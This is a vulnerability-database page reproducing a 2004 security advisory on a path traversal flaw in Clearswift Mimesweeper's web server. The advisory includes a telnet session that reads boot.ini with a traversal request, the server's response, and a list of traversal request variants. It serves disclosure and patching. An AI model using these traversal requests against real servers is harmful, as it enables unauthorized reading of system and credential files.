Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

clearswift.txt

🗓️ 12 Aug 2004 00:00:00Reported by Pierre KromaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 30 Views

Clearswift Mimesweeper vulnerability allows remote file reading through path traversal exploit.

Code
`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
- -------------------------------------------------------------------  
SySS-Advisory: Clearswift Mimesweeper Path Traversal Vulnerability  
- -------------------------------------------------------------------  
  
Problem discovered: July 27th 2004  
Vendor contacted: August 5th 2004  
Advisory published: August 11th 2004  
  
AUTHOR: Pierre Kroma ([email protected])  
SySS GmbH  
72070 Tuebingen / Germany  
Tel.: +49-7071-407856-0  
Key fingerprint = 927A B13E 16F5 BBAB 8F17 75EB D8E1 A9A4 F257 4EEC  
  
APPLICATION: Clearswift Mimesweeper   
AFFECTED VERSION: all < 5.0.4 (5.0.1 tested)  
  
Remotely Exploitable: Yes  
Locally Exploitable: Yes  
  
SEVERITY: Critical  
  
DESCRIPTION:  
It is possible to read arbitrary files on  
the remote server by prepending /foobar/\../\../  
in front on the file name.  
  
EXAMPLE:  
telnet xx.xx.xx.xx 80  
Trying xx.xx.xx.xx...  
Connected to xx.xx.xx.xx.  
Escape character is '^]'.  
GET /foobar/..\\..\\..\\..\\..\\..\\boot.ini HTTP/1.0  
  
HTTP/1.0 200 Ok  
Date: Do, 27 Jul 2004 14:30:07 GMT  
Server: Clearswift Web Server  
Content-length: 186  
Content-type: application/octet-stream  
  
[boot loader]  
timeout=30  
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT  
[operating systems]  
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server"  
/fastdetect  
Connection closed by foreign host.  
  
Here are some serveral examples:  
  
GET /foobar/..\\..\\..\\..\\boot.ini HTTP/1.0  
GET /foobar/..\..\..\..\..\..\\boot.ini HTTP/1.0  
GET /foobar/..\..\..\..\..\..\boot.ini HTTP/1.0  
GET /foobar/\..\..\..\..\..\boot.ini HTTP/1.0  
GET /foobar//..\\..\\..\\..\\boot.ini HTTP/1.0  
GET /foobar//..\\..//..\\..//boot.ini HTTP/1.0  
GET /foobar/\../\../\../\../\boot.ini HTTP/1.0  
GET /foobar/../../../../boot.ini HTTP/1.0  
GET /foobar\..\..\..\..\boot.ini HTTP/1.0  
  
IMPACT: This vulnerability can be used to retrieve any file from the partion where the clearswift webserver is installed. The number of "/","\",".." characters will depend on the ServerRoot (location of the virtual / directory) setting.  
  
VENDOR STATUS: Clearswift has fixed the vulnerability in version >= 5.0.4.  
-----BEGIN PGP SIGNATURE-----  
  
iD8DBQFBGj/O2OGppPJXTuwRApxvAJ96xep/MUzfKKiAm9MlICe4r+Q0OgCghDOO  
sLrOlvzvBPK8xDGB178xQ14=  
=qP1W  
-----END PGP SIGNATURE-----  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Aug 2004 00:00Current
7.4High risk
Vulners AI Score7.4
clearswift mimesweeperpath traversalsecurity advisoryfile readingremote exploitcritical severityvulnerability impact
30